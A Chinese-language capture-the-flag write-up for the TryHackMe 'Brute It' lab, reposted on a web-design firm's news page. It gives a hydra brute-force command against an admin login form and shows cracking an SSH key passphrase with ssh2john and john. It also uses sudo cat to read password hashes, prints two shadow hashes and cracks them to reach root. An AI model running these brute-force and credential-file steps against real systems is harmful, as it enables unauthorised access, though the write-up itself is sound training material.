尧图网站建设 尧图网络
  • 首页
  • 关于我们
  • 服务项目
  • 案例展示
  • 建站流程
  • 资讯中心
  • 联系我们
首页/资讯中心/详情

Brute It -TryHackMe

Brute It -TryHackMe
📅 发布时间:2026/6/18 7:44:12

Brute It -TryHackMe

一、信息收集

  • 使用nmap对网站ip开放端口进行搜集

image-20250913135553060

  • 使用dirsearch发现网站下面有个admin目录访问看看

image-20250913135423468

  • 是一个管理员登录界面

image-20250913135538822

  • 在这个页面右键源代码发现了给我们的提示,告诉我们这个网站的账户是admin,我们抓包使用yakit进行爆破

image-20250913135715601

二、枚举爆破

  • 接下来使用hydra对网站的密码进行爆破
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.255.234 http-post-form "/admin/:user=^USER^&pass=^PASS^&Login=Login:Username or password invalid"

image-20250913143441999

  • 拿到了账户密码去登录看看

image-20250913143518021

  • 这里告诉我们john的私钥,已经很明显了先讲私钥保存到本地在使用ssh2john将私钥转化成哈希值在使用john进行爆破

image-20250913143824543

  • 这里成功爆破出密码 rockinroll 使用ssh对john进行登录

image-20250913144329997

  • 我这里遇到了报错这里直接修改私钥权限就好了chmod 600 id_rsa
Permissions 0664 for 'id_rsa' are too open.
This private key will be ignored.
Load key "id_rsa": bad permissions
当前私钥 id_rsa 权限为 0664(所有者可读写,组可读,其他用户可读)SSH 要求私钥 只能自己读写,不能被组或其他用户访问因此 SSH 忽略了私钥,并回退到密码登录提示

image-20250913145917167

  • 在当前目录发现了user.txt

image-20250913150251761

三、提权

  • 使用sudo -l 看看有什么命令是以root方式启动的

image-20250913150456828

  • 这里可以/bin/cat 命令可以root 权限启动 在这里我们尝试读取/etc/passwd下面的hash值然后保存在使用john进行爆破

image-20250913150911471

image-20250913150927672

image-20250913150940252

$6$zdk0.jUm$Vya24cGzM1duJkwM5b17Q205xDJ47LOAg/OpZvJ1gKbLF8PJBdKJA4a6M.JYPUTAaWu4infDjI88U9yUXEVgL.
$6$iODd0YaH$BA2G28eil/ZUZAV5uNaiNPE0Pa6XHWUFp7uNTp2mooxwa4UzhfC0kjpzPimy1slPNm9r/9soRw8KqrSgfDPfI0
  • 将root和john的hash保存为文件使用john爆破
john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt password.txt  

image-20250913151444050

  • 这里使用john爆破只爆破出来一个密码,尝试登录了一下发现是root的密码

image-20250913152204557

  • 直接查看根目录的root.txt文件

image-20250913152331034

相关新闻

  • 题解:P12336 第三心脏
  • Spring篇知识点(1)
  • uniapp原生插件 TCP Socket 利用文档

最新新闻

  • 完全掌握Blender资源宝典:从入门到实战的5大核心模块深度解析
  • C++多线程编程入门教程(非常详细)
  • 停止手动输入Prompt!AI编码圈的“循环工程”正在颠覆写代码的方式
  • TrafficMonitor插件:终极指南,让你的Windows任务栏变身全能信息中心
  • 从SC-400漏洞修复实战,拆解企业级漏洞管理闭环的“四阶八步”法
  • Claude Code 从安装到调用的保姆级指南(MacOS)

日新闻

  • 5分钟掌握Python进化算法:Geatpy高性能优化工具完全指南
  • Microchip 24AA044 EEPROM选型与应用全指南:从参数解析到实战编程
  • 华为的鸿蒙到底有多牛?为什么称作遥遥领先?

周新闻

  • 3步解锁iOS设备:applera1n激活锁绕过完全指南
  • 39 2026 人工智能证书终极盘点,普通人选 AI 证书可以从这些方向入手
  • Redis 暴露公网有多危险?从端口检查到补救步骤

月新闻

  • 【总结】入门篇:50句话让你记住架构核心概念
  • WeChatMsg技术方案解析:实现Mac微信数据自主管理的完整解决方案
  • WeChatMsg:革新性微信数据备份方案,打造你的专属数字记忆库

关于尧图

  • 公司简介
  • 团队介绍
  • 企业文化
  • 荣誉资质

服务项目

  • 定制开发
  • 电商建站
  • UI 设计
  • 运维服务

快速链接

  • 案例展示
  • 建站流程
  • 常见问题
  • 资讯中心

联系方式

  • 📍北京市朝阳区互联网产业园 A 座 10 层
  • 📞400-888-8888
  • ✉️contact@rkmt.cn
  • 🕐周一至周日 9:00-21:00

© 2024 北京尧图网络科技有限公司 版权所有 | 京 ICP 备 XXXXXXXX 号